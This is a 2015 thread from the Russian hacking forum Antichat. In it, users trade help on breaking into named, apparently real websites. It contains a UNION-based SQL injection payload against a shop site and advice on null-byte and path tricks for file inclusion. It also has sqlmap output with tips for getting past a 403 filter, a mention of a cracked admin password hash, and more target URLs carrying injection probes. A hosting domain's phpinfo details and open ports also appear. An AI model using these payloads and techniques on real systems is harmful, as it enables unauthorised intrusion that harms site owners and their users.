ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.09.2015, 20:18
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от SaNDER
SaNDER said:
↑
А через Charles как это сделать? ну перехвати один из запросов, потом повторно отправляй его меняя куки
Сообщение от None
И ещё на сайте blabla.com/?lang='
Вылезает такое чудо
Warning
: include(language/'.php): failed to open stream: No such file or directory in
/home/vasil78/blabla.com/libs/core.php
on line
34
Предполагаю что это File Inclusion . Как заинклудить ? .
попробуй нулл-байтом отрезать .php, или же юзать багу со слеш-дотами. ничего нового.
|
|
|
26.09.2015, 03:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
8491
Репутация:
7
|
|
Сообщение от SaNDER
SaNDER said:
↑
Мне помог один парень . blabla.com/lang=kkkk../../index Отображается сайт c какими то ошибками .
Нужно обрезать .php,нулл-байт не решает .
А что за бага со слэш-дотами? я не понял .
http://storeshop.hol.es/gpay?note=bill
' вот тут я юнионы,group юзал не помогает,как раскрутить ? Про слеши - https://rdot.org/forum/archive/index.php/t-2611.html
А по скуле... Че тут крутить?
http://storeshop.hol.es/gpay?note=b... 1,2,3,4,5,6,7,version(),9,10,11,12,13,14-- '
|
|
|
|
26.09.2015, 14:28
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от SaNDER
SaNDER said:
↑
странно но не скульмапом,не хэвиджом не инжектит . Хэвидж говорит про 403 Forbbiden,скульмап практически про тоже .
Код:
Code:[*] starting at: 12:52:27
[12:52:54] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
[12:53:04] [WARNING] GET parameter 'note' is not injectable
[12:53:04] [CRITICAL] all parameters are not injectable, try to increase --level
/--risk values to perform more tests. Rerun without providing the --technique sw
itch. Give it a go with the --text-only switch if the target page has a low perc
entage of textual content (~75.91% of page content is text)
[12:53:04] [WARNING] HTTP error codes detected during testing:
403 (Forbidden) - 140 times
[*] shutting down at: 12:53:04
пробуйте добавлять параметры типа юзер-агентов, кук, делать меньше delay и т. д.
|
|
|
|
26.09.2015, 16:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Сообщение от SaNDER
SaNDER said:
↑
Я либо не правильно составляю команды,либо фигня какая-то .
Может кто выручит,другие способы есть?
(Посты за собой удалю т.к мешают .)'
пароль не выкладываю, т.к нельзя. Есть на cmd5.
Вам и так все расжували уже, пробуйте ручками все делать, а не хевиджем со скулмапом.
|
|
|
|
27.09.2015, 20:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
7285
Репутация:
0
|
|
Хелп.
Нужна помощь в раскрутке.
Код:
Code:
http://tao.kg/?p=search&search=dota+2&Provider=Taobao&SearchMethod=Extended&cid=-1%27
http://dota2.name/request/edit/?act=skype&id=\
POST
name=skype&pk=1&value=e
Как двигаться дальше через ошибки вида:
Код:
Code:
/page.php
site.com/page/
Например:
Код:
Code:
http://kasko-center.by/kasko.courses.php
http://www.24tv.by/24old/
Есть ли тут sqli?
Код:
Code:
http://steam-store.ru/pay
POST
price=3
|
|
|
|
28.09.2015, 12:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Сообщение от ButilkaSoka
ButilkaSoka said:
↑
Хелп.
Нужна помощь в раскрутке.
Код:
Code:
http://tao.kg/?p=search&search=dota+2&Provider=Taobao&SearchMethod=Extended&cid=-1%27
http://dota2.name/request/edit/?act=skype&id=\
POST
name=skype&pk=1&value=e
Как двигаться дальше через ошибки вида:
Код:
Code:
/page.php
site.com/page/
Например:
Код:
Code:
http://kasko-center.by/kasko.courses.php
http://www.24tv.by/24old/
Есть ли тут sqli?
Код:
Code:
http://steam-store.ru/pay
POST
price=3
http://kasko-center.by/kasko.courses.php
http://www.24tv.by/24old/
Просто ошибки сайта (раскрытие путей), ничего не делать, искать другие уязвимости.
|
|
|
|
28.09.2015, 18:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
7728
Репутация:
5
|
|
Сообщение от SaNDER
SaNDER said:
↑
Взломав домен хостинга,можно ли взломать и сам хостинг?А после и сайты на котором стоят хостинги,тоже можно взломать ? .
домен.хостинг.ру
вытащил из него phpinfo .
а как юзать не знаю .
Узнал версию phpMyAdmin 4.4.14
Узнал версиюPHP Version 5.4.45
Server API Apache 2.0 Handler
OC Linux
apache2handler
Apache Version Apache/2.2.22 (@Release@)
APCu Support Enabled
SERVER_ADDR
ну там дофига чего я лишь часть показал что ещё нужно и как это юзать?
Version 4.0.7
Работает
домен.хостинг.ру/phpMyAdmin/doc/html/search.html
Открытые порты
Spoiler - 3306
- 1500
- 995
- 993
- 465
- 443
- 143
- 110
- 80
- 81
- 53/tcp и /udp
- 25
- 22
- 21
_ttp:moe-porno.com/acux7707%C0%BEz1%C0%BCz2a%90bcxuca7707 HTTP/1.1
Осторожно,порнуха=) .
При переходе по линке вылезает это
Код:
Code:
warning: htmlspecialchars(): Invalid multibyte sequence in argument in /home/moe-porno/data/www/moe-porno.com/includes/bootstrap.inc on line 860.
Сканил Acunetix 10-ым .
Что это SQL?File Inclusion ?
_ttp://moe-porno.com/search?searchid=2137557&text[]=&web=0 тоже самое . Лол
Нашел phpinfo и решил взломать хостинг,фантазер однако
|
|
|
|
28.09.2015, 19:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
7728
Репутация:
5
|
|
Сообщение от SaNDER
SaNDER said:
↑
домен.хостинг.ру/phpMyAdmin/doc/html/search.html
К сведению там не токо PHPinfo
. Всё же начинается по-малому,да и хостинг не золото .
Лучше помоги там где ссылка по-ниже . . Я с такой хернёй впервые сталкиваюсь . Ну смотри,ты кое-как нарыл инфу по версиям ПО,теперь проверь есть ли на них уязвимости,сплоиты.
Но это тебе не особо поможет.
|
|
|
|
28.09.2015, 19:55
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29
Репутация:
0
|
|
Сообщение от SaNDER
SaNDER said:
↑
домен.хостинг.ру/phpMyAdmin/doc/html/search.html
Лучше помоги там где ссылка по-ниже . . Я с такой хернёй впервые сталкиваюсь . Invalid multibyte
говорит о том, что данные получены не в UTF-8, как ожидала функция, а хз в какой. Этот прием полезен чтобы получить раскрытие путей, что у Вас и получилось
Сообщение от 3ran
3ran said:
↑
Ну смотри,ты кое-как нарыл инфу по версиям ПО,теперь проверь есть ли на них уязвимости,сплоиты.
Но это тебе не особо поможет. Если идти последовательно, то сперва всегда идет сбор данных, а после проверка гипотез
|
|
|
|
29.09.2015, 14:06
|
|
Постоянный
Регистрация: 20.01.2010
Сообщений: 338
Провел на форуме:
500264
Репутация:
69
|
|
Код:
Code:
http://www.game-debate.com/benchmark/bm_datatable.php?bRegex=false&bRegex_0=false&bRegex_1=false&bRegex_10=false&bRegex_11=false&bRegex_2=false&bRegex_3=false&bRegex_4=false&bRegex_5=false&bRegex_6=false&bRegex_7=false&bRegex_8=false&bRegex_9=false&bSearchable_0=true&bSearchable_1=true&bSearchable_10=true&bSearchable_11=true&bSearchable_2=true&bSearchable_3=true&bSearchable_4=true&bSearchable_5=true&bSearchable_6=true&bSearchable_7=true&bSearchable_8=true&bSearchable_9=true&bSortable_0=true&bSortable_1=true&bSortable_10=true&bSortable_11=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&bSortable_8=true&bSortable_9=true&iColumns=12&iDisplayLength=1%27%22&iDisplayStart=0&iSortCol_0=1&iSortingCols=1&mDataProp_0=rbt_tool&mDataProp_1=rb_bench&mDataProp_10=m_graf&mDataProp_11=rbt_test&mDataProp_2=m_cpu_deriv&mDataProp_3=m_graf_deriv&mDataProp_4=rbt_types&mDataProp_5=m_username&mDataProp_6=rb_date&mDataProp_7=rb_id&mDataProp_8=m_id&mDataProp_9=m_cpu&sColumns=&sEcho=3&sSearch=&sSearch_0=&sSearch_1=&sSearch_10=&sSearch_11=&sSearch_2=&sSearch_3=&sSearch_4=&sSearch_5=&sSearch_6=&sSearch_7=&sSearch_8=&sSearch_9=&sSortDir_0=asc&_=1443468868286
Возможно ли раскрутить? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
